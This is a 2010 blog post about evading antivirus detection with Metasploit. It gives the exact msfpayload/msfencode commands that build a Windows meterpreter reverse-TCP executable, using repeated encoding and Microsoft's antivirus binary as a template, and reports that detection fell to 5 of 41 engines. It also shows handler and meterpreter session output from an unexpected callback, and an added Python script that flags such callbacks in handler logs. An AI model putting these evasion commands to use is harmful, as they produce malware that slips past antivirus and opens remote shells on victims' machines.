Tuesday, March 30, 2010

metasploit vs virustotal

A few days back I saw a post (http://practicalexploitation.com/post/417194846/rob-could-you-cover-anti-virus-evasion-i-was-going) on tactical exploitation from jeffhnet, asking for help on bypassing AVGs. Trying to do the same, I started with metasploit's meterpreter and the usual attempts to bypass AVG.

My first attempt got a high rate of red flags on VirusTotal and NoVirusThanks, around 35% to 40%. The command I used was:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -t exe -o test1.exe

I changed the encoder and got slightly better results with:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -e x86/call4_dword_xor -t exe -o test2-0.exe

Finally I ended up with:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x msseces.exe -t exe -o test2-5-mss.exe

msseces.exe is the Microsoft antivirus executable, and I used it as the template for msfencode. It produced a nice big exe that was almost undetectable: 3 hits on NoVirusThanks and 5/41 (12.2%) on VirusTotal (MD5: ca904e0c8ac8ec6e34b85f5c1c9b36bb). Roughly good results; the only thing bothering me was that the file was still detected by Microsoft, NOD32 and Symantec, but I settled for giving it another try the next day.

So today I fired up msfconsole and a multi handler to be ready to test my exe files, as I was going to scramble them with some commercial packers/encryptors/protectors. As I was going through a list of protectors to start with, I saw a strange connection to my console:

[*] Started reverse handler on myhost:4444
[*] Starting the payload handler...

[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (myhost:4444 -> 67.124.xx.xx:47364)
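As an added example (not code from the original post), here is a small Python check that parses multi/handler console output like the lines above and flags any session whose source address lies outside the lab networks you expect test callbacks from; a stray callback from a scanner's sandbox would stand out this way. The log text, the lab range and the remote addresses in it are constructed for the example, not the post's.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample of a Metasploit multi/handler console log, modelled on
# the lines in the post. Addresses are documentation ranges, not real hosts.
HANDLER_LOG = """\
[*] Started reverse handler on 192.0.2.10:4444
[*] Starting the payload handler...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.0.2.10:4444 -> 192.0.2.25:49152)
[*] Sending stage (747008 bytes)
[*] Meterpreter session 2 opened (192.0.2.10:4444 -> 203.0.113.77:47364)
"""

# Networks that are allowed to call back during a test: the lab only (assumed).
EXPECTED_SOURCES = [ip_network("192.0.2.0/24")]

# Matches the "session opened" line format printed by the handler.
SESSION_RE = re.compile(
    r"Meterpreter session (?P<sid>\d+) opened "
    r"\((?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)\)"
)

def parse_sessions(log):
    """Return one dict (sid, lhost, lport, rhost, rport) per opened session."""
    sessions = []
    for line in log.splitlines():
        m = SESSION_RE.search(line)
        if m:
            d = m.groupdict()
            for key in ("sid", "lport", "rport"):
                d[key] = int(d[key])
            sessions.append(d)
    return sessions

def unexpected_sessions(log, expected=EXPECTED_SOURCES):
    """Sessions whose source address is outside every expected network."""
    flagged = []
    for s in parse_sessions(log):
        src = ip_address(s["rhost"])
        if not any(src in net for net in expected):
            flagged.append(s)
    return flagged

if __name__ == "__main__":
    for s in unexpected_sessions(HANDLER_LOG):
        print(f"session {s['sid']}: unexpected callback from {s['rhost']}:{s['rport']}")
```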

I immediately did an ls and saw the following:

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 1048392 fil Fri Mar 05 13:39:03 +0200 2010 0B7BBu.exe
100777/rwxrwxrwx 0 fil Sat Oct 14 19:27:15 +0300 2006 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Sat Oct 14 19:27:15 +0300 2006 CONFIG.SYS
40777/rwxrwxrwx 0 dir Sat Oct 14 19:44:53 +0300 2006 Documents and Settings
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Sat Oct 14 19:49:28 +0300 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Tue Aug 12 00:54:21 +0300 2008 Program Files
40777/rwxrwxrwx 0 dir Tue Aug 12 00:12:52 +0300 2008 RECYCLER
40777/rwxrwxrwx 0 dir Wed Nov 22 00:13:02 +0200 2006 System Volume Information
40777/rwxrwxrwx 0 dir Tue Aug 12 00:54:27 +0300 2008 WINDOWS
100666/rw-rw-rw- 202 fil Wed Nov 22 00:15:27 +0200 2006 boot.ini
100444/r--r--r-- 250032 fil Sat Oct 14 19:49:28 +0300 2006 ntldr
100666/rw-rw-rw- 402653184 fil Fri Mar 05 13:38:03 +0200 2010 pagefile.sys
40777/rwxrwxrwx 0 dir Tue Aug 12 00:15:46 +0300 2008 temp

0B7BBu.exe was the same size as my file, and here is the process list:

meterpreter > ps

Process list
============

PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86
420 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
684 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
708 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
752 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
920 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1200 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1336 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1448 explorer.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\Explorer.EXE
1616 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1684 msmsgs.exe x86 HD8R2JDS87REW82\Administrator C:\Program Files\Messenger\msmsgs.exe
1828 rundll32.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\rundll32.exe
940 alg.exe x86 C:\WINDOWS\System32\alg.exe
1300 wscntfy.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wscntfy.exe
1028 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1660 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1700 popwack.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\popwack.exe
1756 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1444 0B7BBu.exe x86 HD8R2JDS87REW82\Administrator C:\0B7BBu.exe
2028 wuauclt.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.exe
2016 wuauclt.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wuauclt.exe
1820 wmiprvse.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\wbem\wmiprvse.exe

So that's about it: the connection was dropped after that, and in a couple of days my file will be marked as viral by more engines, I guess.

The next thing I'd like to do is find out where this connection came from. Was it because the file was on NoVirusThanks, which claims they do not distribute samples, or from VirusTotal?

More in part 2.